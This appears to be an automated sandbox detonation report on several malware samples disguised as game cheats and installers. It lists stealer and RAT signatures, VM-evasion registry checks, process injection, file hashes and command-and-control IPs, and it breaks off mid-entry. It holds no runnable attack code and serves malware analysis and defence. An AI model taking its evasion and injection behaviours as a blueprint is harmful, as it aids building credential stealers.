memory/2228-109-0x0000000006510000-0x000000000658A000-memory.dmp

memory/2228-107-0x0000000006510000-0x000000000658A000-memory.dmp

memory/2228-105-0x0000000006510000-0x000000000658A000-memory.dmp

memory/2228-103-0x0000000006510000-0x000000000658A000-memory.dmp

memory/2228-99-0x0000000006510000-0x000000000658A000-memory.dmp

memory/2228-97-0x0000000006510000-0x000000000658A000-memory.dmp

memory/2228-95-0x0000000006510000-0x000000000658A000-memory.dmp

memory/2228-93-0x0000000006510000-0x000000000658A000-memory.dmp

memory/2228-91-0x0000000006510000-0x000000000658A000-memory.dmp

memory/2228-89-0x0000000006510000-0x000000000658A000-memory.dmp

memory/2228-87-0x0000000006510000-0x000000000658A000-memory.dmp

memory/2228-85-0x0000000006510000-0x000000000658A000-memory.dmp

memory/2228-83-0x0000000006510000-0x000000000658A000-memory.dmp

memory/2228-81-0x0000000006510000-0x000000000658A000-memory.dmp

memory/2228-79-0x0000000006510000-0x000000000658A000-memory.dmp

memory/2228-77-0x0000000006510000-0x000000000658A000-memory.dmp

memory/2228-73-0x0000000006510000-0x000000000658A000-memory.dmp

memory/2228-69-0x0000000006510000-0x000000000658A000-memory.dmp

memory/2228-67-0x0000000006510000-0x000000000658A000-memory.dmp

memory/2228-65-0x0000000006510000-0x000000000658A000-memory.dmp

memory/2228-63-0x0000000006510000-0x000000000658A000-memory.dmp

memory/2228-61-0x0000000006510000-0x000000000658A000-memory.dmp

memory/2228-59-0x0000000006510000-0x000000000658A000-memory.dmp

memory/2228-57-0x0000000006510000-0x000000000658A000-memory.dmp

memory/2228-55-0x0000000006510000-0x000000000658A000-memory.dmp

memory/2228-117-0x0000000006510000-0x000000000658A000-memory.dmp

memory/2228-101-0x0000000006510000-0x000000000658A000-memory.dmp

memory/2228-75-0x0000000006510000-0x000000000658A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\RegAsm.exe

MD5 0d5df43af2916f47d00c1573797c1a13
SHA1 230ab5559e806574d26b4c20847c368ed55483b0
SHA256 c066aee7aa3aa83f763ebc5541daa266ed6c648fbffcde0d836a13b221bb2adc
SHA512 f96cf9e1890746b12daf839a6d0f16f062b72c1b8a40439f96583f242980f10f867720232a6fa0f7d4d7ac0a7a6143981a5a130d6417ea98b181447134c7cfe2

memory/2228-2543-0x0000000074C90000-0x0000000075440000-memory.dmp

memory/6056-2542-0x0000000000400000-0x000000000041E000-memory.dmp

memory/6056-2544-0x0000000005620000-0x0000000005C38000-memory.dmp

memory/6056-2545-0x0000000005060000-0x0000000005072000-memory.dmp

memory/6056-2546-0x0000000005100000-0x000000000513C000-memory.dmp

memory/6056-2547-0x0000000005140000-0x000000000518C000-memory.dmp

memory/6056-2548-0x00000000053B0000-0x00000000054BA000-memory.dmp

Analysis: behavioral23

Detonation Overview

Submitted

2024-11-09 16:28

Reported

2024-11-09 16:31

Platform

win7-20240903-en

Max time kernel

117s

Max time network

121s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Vape_V4.exe"

Signatures

Mercurial Grabber Stealer

stealer mercurialgrabber

Mercurialgrabber family

mercurialgrabber

Looks for VirtualBox Guest Additions in registry

evasion

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\Oracle\VirtualBox Guest Additions C:\Users\Admin\AppData\Local\Temp\Vape_V4.exe N/A

Looks for VMWare Tools registry key

evasion

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\VMWare, Inc.\VMWare Tools C:\Users\Admin\AppData\Local\Temp\Vape_V4.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\Vape_V4.exe N/A

Reads user/profile data of web browsers

spyware stealer

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip4.seeip.org N/A N/A
N/A ip-api.com N/A N/A

Maps connected drives based on registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\Users\Admin\AppData\Local\Temp\Vape_V4.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 C:\Users\Admin\AppData\Local\Temp\Vape_V4.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_VMware_&Prod_VMware_Virtual_S C:\Users\Admin\AppData\Local\Temp\Vape_V4.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\Vape_V4.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\Vape_V4.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosInformation C:\Users\Admin\AppData\Local\Temp\Vape_V4.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemManufacturer C:\Users\Admin\AppData\Local\Temp\Vape_V4.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemProductName C:\Users\Admin\AppData\Local\Temp\Vape_V4.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Logical Unit Id 0 C:\Users\Admin\AppData\Local\Temp\Vape_V4.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Vape_V4.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1848 wrote to memory of 2920 N/A C:\Users\Admin\AppData\Local\Temp\Vape_V4.exe C:\Windows\system32\WerFault.exe
PID 1848 wrote to memory of 2920 N/A C:\Users\Admin\AppData\Local\Temp\Vape_V4.exe C:\Windows\system32\WerFault.exe
PID 1848 wrote to memory of 2920 N/A C:\Users\Admin\AppData\Local\Temp\Vape_V4.exe C:\Windows\system32\WerFault.exe

Processes

C:\Users\Admin\AppData\Local\Temp\Vape_V4.exe

"C:\Users\Admin\AppData\Local\Temp\Vape_V4.exe"

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 1848 -s 1400

Network

Country Destination Domain Proto
US 8.8.8.8:53 ip4.seeip.org udp
US 23.128.64.141:443 ip4.seeip.org tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp

Files

memory/1848-0-0x000007FEF6033000-0x000007FEF6034000-memory.dmp

memory/1848-1-0x0000000000F20000-0x0000000000F30000-memory.dmp

memory/1848-2-0x000007FEF6030000-0x000007FEF6A1C000-memory.dmp

memory/1848-3-0x000007FEF6033000-0x000007FEF6034000-memory.dmp

memory/1848-4-0x000007FEF6030000-0x000007FEF6A1C000-memory.dmp

memory/1848-5-0x000007FEF6030000-0x000007FEF6A1C000-memory.dmp

Analysis: behavioral11

Detonation Overview

Submitted

2024-11-09 16:28

Reported

2024-11-09 16:31

Platform

win7-20241010-en

Max time kernel

134s

Max time network

152s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Installer.exe"

Signatures

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Redline family

redline

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Sectoprat family

sectoprat

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2116 set thread context of 2156 N/A C:\Users\Admin\AppData\Local\Temp\Installer.exe C:\Users\Admin\AppData\Local\Temp\Installer.exe

System Location Discovery: System Language Discovery

discovery

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Installer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Installer.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Installer.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Installer.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2116 wrote to memory of 2156 N/A C:\Users\Admin\AppData\Local\Temp\Installer.exe C:\Users\Admin\AppData\Local\Temp\Installer.exe
PID 2116 wrote to memory of 2156 N/A C:\Users\Admin\AppData\Local\Temp\Installer.exe C:\Users\Admin\AppData\Local\Temp\Installer.exe
PID 2116 wrote to memory of 2156 N/A C:\Users\Admin\AppData\Local\Temp\Installer.exe C:\Users\Admin\AppData\Local\Temp\Installer.exe
PID 2116 wrote to memory of 2156 N/A C:\Users\Admin\AppData\Local\Temp\Installer.exe C:\Users\Admin\AppData\Local\Temp\Installer.exe
PID 2116 wrote to memory of 2156 N/A C:\Users\Admin\AppData\Local\Temp\Installer.exe C:\Users\Admin\AppData\Local\Temp\Installer.exe
PID 2116 wrote to memory of 2156 N/A C:\Users\Admin\AppData\Local\Temp\Installer.exe C:\Users\Admin\AppData\Local\Temp\Installer.exe
PID 2116 wrote to memory of 2156 N/A C:\Users\Admin\AppData\Local\Temp\Installer.exe C:\Users\Admin\AppData\Local\Temp\Installer.exe
PID 2116 wrote to memory of 2156 N/A C:\Users\Admin\AppData\Local\Temp\Installer.exe C:\Users\Admin\AppData\Local\Temp\Installer.exe
PID 2116 wrote to memory of 2156 N/A C:\Users\Admin\AppData\Local\Temp\Installer.exe C:\Users\Admin\AppData\Local\Temp\Installer.exe
PID 2116 wrote to memory of 2156 N/A C:\Users\Admin\AppData\Local\Temp\Installer.exe C:\Users\Admin\AppData\Local\Temp\Installer.exe
PID 2116 wrote to memory of 2156 N/A C:\Users\Admin\AppData\Local\Temp\Installer.exe C:\Users\Admin\AppData\Local\Temp\Installer.exe
PID 2116 wrote to memory of 2156 N/A C:\Users\Admin\AppData\Local\Temp\Installer.exe C:\Users\Admin\AppData\Local\Temp\Installer.exe

Processes

C:\Users\Admin\AppData\Local\Temp\Installer.exe

"C:\Users\Admin\AppData\Local\Temp\Installer.exe"

C:\Users\Admin\AppData\Local\Temp\Installer.exe

C:\Users\Admin\AppData\Local\Temp\Installer.exe

Network

Country Destination Domain Proto
FI 95.217.248.44:11695 tcp
FI 95.217.248.44:11695 tcp
FI 95.217.248.44:11695 tcp
FI 95.217.248.44:11695 tcp
FI 95.217.248.44:11695 tcp
FI 95.217.248.44:11695 tcp

Files

memory/2116-0-0x0000000074DCE000-0x0000000074DCF000-memory.dmp

memory/2116-1-0x0000000000D20000-0x0000000000E32000-memory.dmp

memory/2116-2-0x0000000074DC0000-0x00000000754AE000-memory.dmp

memory/2116-3-0x0000000000900000-0x0000000000922000-memory.dmp

memory/2156-8-0x0000000000400000-0x0000000000420000-memory.dmp

memory/2156-6-0x0000000000400000-0x0000000000420000-memory.dmp

memory/2116-10-0x0000000074DC0000-0x00000000754AE000-memory.dmp

memory/2156-9-0x0000000074DC0000-0x00000000754AE000-memory.dmp

memory/2156-4-0x0000000000400000-0x0000000000420000-memory.dmp

memory/2156-11-0x0000000074DC0000-0x00000000754AE000-memory.dmp

memory/2156-12-0x0000000074DC0000-0x00000000754AE000-memory.dmp

Analysis: behavioral6

Detonation Overview

Submitted

2024-11-09 16:28

Reported

2024-11-09 16:31

Platform

win10v2004-20241007-en

Max time kernel

94s

Max time network

142s

Command Line

"C:\Users\Admin\AppData\Local\Temp\CSGO FREEHACK.exe"

Signatures

System Location Discovery: System Language Discovery

discovery

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\CSGO FREEHACK.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\CSGO FREEHACK.exe

"C:\Users\Admin\AppData\Local\Temp\CSGO FREEHACK.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 23.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 53.210.109.20.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 103.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp

Files

memory/4772-0-0x0000000074AFE000-0x0000000074AFF000-memory.dmp

memory/4772-1-0x00000000002D0000-0x0000000000374000-memory.dmp

memory/4772-2-0x0000000004CF0000-0x0000000004D66000-memory.dmp

memory/4772-3-0x0000000002730000-0x000000000274E000-memory.dmp

memory/4772-4-0x0000000074AF0000-0x00000000752A0000-memory.dmp

memory/4772-5-0x0000000074AFE000-0x0000000074AFF000-memory.dmp

memory/4772-6-0x0000000074AF0000-0x00000000752A0000-memory.dmp

Analysis: behavioral14

Detonation Overview

Submitted

2024-11-09 16:28

Reported

2024-11-09 16:31

Platform

win10v2004-20241007-en

Max time kernel

149s

Max time network

155s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Installer2.exe"

Signatures

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A

Redline family

redline

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A

Sectoprat family

sectoprat

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2068 set thread context of 4612 N/A C:\Users\Admin\AppData\Local\Temp\Installer2.exe C:\Users\Admin\AppData\Local\Temp\Installer2.exe

System Location Discovery: System Language Discovery

discovery

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Installer2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Installer2.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Installer2.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Installer2.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Installer2.exe

"C:\Users\Admin\AppData\Local\Temp\Installer2.exe"

C:\Users\Admin\AppData\Local\Temp\Installer2.exe

C:\Users\Admin\AppData\Local\Temp\Installer2.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
NL 185.92.73.140:80 185.92.73.140 tcp
NL 185.92.73.140:443 tcp
US 8.8.8.8:53 138.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 140.73.92.185.in-addr.arpa udp
NL 185.92.73.140:443 tcp
NL 185.92.73.140:443 tcp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
NL 185.92.73.140:443 tcp
NL 185.92.73.140:443 tcp
NL 185.92.73.140:443 tcp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
NL 185.92.73.140:443 tcp
US 8.8.8.8:53 98.209.201.84.in-addr.arpa udp
NL 185.92.73.140:443 tcp
NL 185.92.73.140:443 tcp
NL 185.92.73.140:443 tcp
NL 185.92.73.140:443 tcp
NL 185.92.73.140:443 tcp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
NL 185.92.73.140:443 tcp
NL 185.92.73.140:443 tcp
NL 185.92.73.140:443 tcp
NL 185.92.73.140:443 tcp
NL 185.92.73.140:443 tcp
NL 185.92.73.140:443 tcp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
NL 185.92.73.140:443 tcp
NL 185.92.73.140:443 tcp
NL 185.92.73.140:443 tcp
NL 185.92.73.140:443 tcp
NL 185.92.73.140:443 tcp
NL 185.92.73.140:443 tcp
NL 185.92.73.140:443 tcp
NL 185.92.73.140:443 tcp
NL 185.92.73.140:443 tcp
NL 185.92.73.140:443 tcp
NL 185.92.73.140:443 tcp

Files

memory/2068-0-0x000000007474E000-0x000000007474F000-memory.dmp

memory/2068-1-0x00000000002B0000-0x0000000000324000-memory.dmp

memory/2068-2-0x0000000005240000-0x00000000057E4000-memory.dmp

memory/2068-3-0x0000000004D30000-0x0000000004DC2000-memory.dmp

memory/2068-4-0x0000000004ED0000-0x0000000004EDA000-memory.dmp

memory/2068-5-0x0000000074740000-0x0000000074EF0000-memory.dmp

memory/2068-6-0x0000000004FA0000-0x0000000004FC2000-memory.dmp

memory/4612-7-0x0000000000400000-0x000000000041E000-memory.dmp

memory/4612-11-0x0000000074740000-0x0000000074EF0000-memory.dmp

memory/4612-9-0x00000000057B0000-0x0000000005DC8000-memory.dmp

memory/4612-12-0x00000000052B0000-0x00000000052EC000-memory.dmp

memory/2068-13-0x0000000074740000-0x0000000074EF0000-memory.dmp

memory/4612-10-0x0000000005210000-0x0000000005222000-memory.dmp

memory/4612-14-0x00000000052F0000-0x000000000533C000-memory.dmp

memory/4612-15-0x0000000074740000-0x0000000074EF0000-memory.dmp

memory/4612-16-0x0000000005560000-0x000000000566A000-memory.dmp

memory/4612-17-0x0000000074740000-0x0000000074EF0000-memory.dmp

Analysis: behavioral25

Detonation Overview

Submitted

2024-11-09 16:28

Reported

2024-11-09 16:31

Platform

win7-20241010-en

Max time kernel

137s

Max time network

156s

Command Line

"C:\Users\Admin\AppData\Local\Temp\launcher.exe"

Signatures

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Redline family

redline

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Sectoprat family

sectoprat

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2124 set thread context of 2220 N/A C:\Users\Admin\AppData\Local\Temp\launcher.exe C:\Users\Admin\AppData\Local\Temp\launcher.exe

System Location Discovery: System Language Discovery

discovery

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\launcher.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\launcher.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\launcher.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2124 wrote to memory of 2220 N/A C:\Users\Admin\AppData\Local\Temp\launcher.exe C:\Users\Admin\AppData\Local\Temp\launcher.exe
PID 2124 wrote to memory of 2220 N/A C:\Users\Admin\AppData\Local\Temp\launcher.exe C:\Users\Admin\AppData\Local\Temp\launcher.exe
PID 2124 wrote to memory of 2220 N/A C:\Users\Admin\AppData\Local\Temp\launcher.exe C:\Users\Admin\AppData\Local\Temp\launcher.exe
PID 2124 wrote to memory of 2220 N/A C:\Users\Admin\AppData\Local\Temp\launcher.exe C:\Users\Admin\AppData\Local\Temp\launcher.exe
PID 2124 wrote to memory of 2220 N/A C:\Users\Admin\AppData\Local\Temp\launcher.exe C:\Users\Admin\AppData\Local\Temp\launcher.exe
PID 2124 wrote to memory of 2220 N/A C:\Users\Admin\AppData\Local\Temp\launcher.exe C:\Users\Admin\AppData\Local\Temp\launcher.exe
PID 2124 wrote to memory of 2220 N/A C:\Users\Admin\AppData\Local\Temp\launcher.exe C:\Users\Admin\AppData\Local\Temp\launcher.exe
PID 2124 wrote to memory of 2220 N/A C:\Users\Admin\AppData\Local\Temp\launcher.exe C:\Users\Admin\AppData\Local\Temp\launcher.exe
PID 2124 wrote to memory of 2220 N/A C:\Users\Admin\AppData\Local\Temp\launcher.exe C:\Users\Admin\AppData\Local\Temp\launcher.exe
PID 2124 wrote to memory of 2220 N/A C:\Users\Admin\AppData\Local\Temp\launcher.exe C:\Users\Admin\AppData\Local\Temp\launcher.exe
PID 2124 wrote to memory of 2220 N/A C:\Users\Admin\AppData\Local\Temp\launcher.exe C:\Users\Admin\AppData\Local\Temp\launcher.exe
PID 2124 wrote to memory of 2220 N/A C:\Users\Admin\AppData\Local\Temp\launcher.exe C:\Users\Admin\AppData\Local\Temp\launcher.exe

Processes

C:\Users\Admin\AppData\Local\Temp\launcher.exe

"C:\Users\Admin\AppData\Local\Temp\launcher.exe"

C:\Users\Admin\AppData\Local\Temp\launcher.exe

C:\Users\Admin\AppData\Local\Temp\launcher.exe

Network

Country Destination Domain Proto
DE 3.68.106.170:59223 tcp
DE 3.68.106.170:59223 tcp
DE 3.68.106.170:59223 tcp
DE 3.68.106.170:59223 tcp
DE 3.68.106.170:59223 tcp
DE 3.68.106.170:59223 tcp

Files

memory/2124-0-0x0000000074C6E000-0x0000000074C6F000-memory.dmp

memory/2124-1-0x0000000000210000-0x0000000000274000-memory.dmp

memory/2124-2-0x0000000074C60000-0x000000007534E000-memory.dmp

memory/2220-6-0x0000000000400000-0x000000000041E000-memory.dmp

memory/2220-13-0x0000000000400000-0x000000000041E000-memory.dmp

memory/2220-11-0x0000000000400000-0x000000000041E000-memory.dmp

memory/2220-14-0x0000000074C60000-0x000000007534E000-memory.dmp

memory/2220-9-0x0000000000400000-0x000000000041E000-memory.dmp

memory/2220-7-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2220-5-0x0000000000400000-0x000000000041E000-memory.dmp

memory/2124-15-0x0000000074C60000-0x000000007534E000-memory.dmp

memory/2220-3-0x0000000000400000-0x000000000041E000-memory.dmp

memory/2220-4-0x0000000000400000-0x000000000041E000-memory.dmp

memory/2220-16-0x0000000074C60000-0x000000007534E000-memory.dmp

memory/2220-17-0x0000000074C60000-0x000000007534E000-memory.dmp

Analysis: behavioral5

Detonation Overview

Submitted

2024-11-09 16:28

Reported

2024-11-09 16:31

Platform

win7-20240903-en

Max time kernel

117s

Max time network

118s

Command Line

"C:\Users\Admin\AppData\Local\Temp\CSGO FREEHACK.exe"

Signatures

System Location Discovery: System Language Discovery

discovery

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\CSGO FREEHACK.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\CSGO FREEHACK.exe

"C:\Users\Admin\AppData\Local\Temp\CSGO FREEHACK.exe"

Network

N/A

Files

memory/2272-0-0x0000000074D6E000-0x0000000074D6F000-memory.dmp

memory/2272-1-0x0000000000A50000-0x0000000000AF4000-memory.dmp

memory/2272-2-0x0000000074D60000-0x000000007544E000-memory.dmp

memory/2272-3-0x0000000074D6E000-0x0000000074D6F000-memory.dmp

memory/2272-4-0x0000000074D60000-0x000000007544E000-memory.dmp

Analysis: behavioral27

Detonation Overview

Submitted

2024-11-09 16:28

Reported

2024-11-09 16:31

Platform

win7-20240903-en

Max time kernel

144s

Max time network

119s

Command Line

"C:\Users\Admin\AppData\Local\Temp\nixware crack.exe"

Signatures

System Location Discovery: System Language Discovery

discovery

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\nixware crack.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\nixware crack.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\nixware crack.exe

"C:\Users\Admin\AppData\Local\Temp\nixware crack.exe"

Network

N/A

Files

N/A

Analysis: behavioral9

Detonation Overview

Submitted

2024-11-09 16:28

Reported

2024-11-09 16:31

Platform

win7-20240903-en

Max time kernel

140s

Max time network

144s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Install.exe"

Signatures

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Redline family

redline

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Sectoprat family

sectoprat

System Location Discovery: System Language Discovery

discovery

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Install.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Install.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Install.exe

"C:\Users\Admin\AppData\Local\Temp\Install.exe"

Network

Country Destination Domain Proto
NL 45.14.49.109:54819 tcp
NL 45.14.49.109:54819 tcp
NL 45.14.49.109:54819 tcp
NL 45.14.49.109:54819 tcp
NL 45.14.49.109:54819 tcp
NL 45.14.49.109:54819 tcp

Files

memory/2336-1-0x0000000002D90000-0x0000000002DB2000-memory.dmp

memory/2336-2-0x0000000004BB0000-0x0000000004BD0000-memory.dmp

memory/2336-3-0x0000000000400000-0x0000000002C86000-memory.dmp

Analysis: behavioral16

Detonation Overview

Submitted

2024-11-09 16:28

Reported

2024-11-09 16:31

Platform

win10v2004-20241007-en

Max time kernel

133s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Kiddions Mod MENU.exe"

Signatures

Reads user/profile data of web browsers

spyware stealer

Browser Information Discovery

discovery

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\Kiddions Mod MENU.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\Kiddions Mod MENU.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Kiddions Mod MENU.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Kiddions Mod MENU.exe

"C:\Users\Admin\AppData\Local\Temp\Kiddions Mod MENU.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
NL 185.182.82.35:4420 tcp
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
NL 185.182.82.35:4420 tcp
US 8.8.8.8:53 56.163.245.4.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 75.209.201.84.in-addr.arpa udp
NL 185.182.82.35:4420 tcp
US 8.8.8.8:53 99.208.201.84.in-addr.arpa udp
NL 185.182.82.35:4420 tcp
NL 185.182.82.35:4420 tcp
US 8.8.8.8:53 29.243.111.52.in-addr.arpa udp
NL 185.182.82.35:4420 tcp
NL 185.182.82.35:4420 tcp

Files

memory/2396-0-0x00007FFC7E8E3000-0x00007FFC7E8E5000-memory.dmp

memory/2396-1-0x0000000000B00000-0x0000000000B2A000-memory.dmp

memory/2396-2-0x00007FFC7E8E0000-0x00007FFC7F3A1000-memory.dmp

memory/2396-29-0x000000001E3D0000-0x000000001E592000-memory.dmp

memory/2396-37-0x000000001ECA0000-0x000000001ED16000-memory.dmp

memory/2396-53-0x000000001F7D0000-0x000000001F820000-memory.dmp

memory/2396-57-0x0000000020470000-0x0000000020998000-memory.dmp

memory/2396-58-0x00007FFC7E8E3000-0x00007FFC7E8E5000-memory.dmp

memory/2396-59-0x00007FFC7E8E0000-0x00007FFC7F3A1000-memory.dmp

Analysis: behavioral7

Detonation Overview

Submitted

2024-11-09 16:28

Reported

2024-11-09 16:31

Platform

win7-20240729-en

Max time kernel

144s

Max time network

136s

Command Line

"C:\Users\Admin\AppData\Local\Temp\CSGhost-v4.1.exe"

Signatures

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\CSGhost-v4.1.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
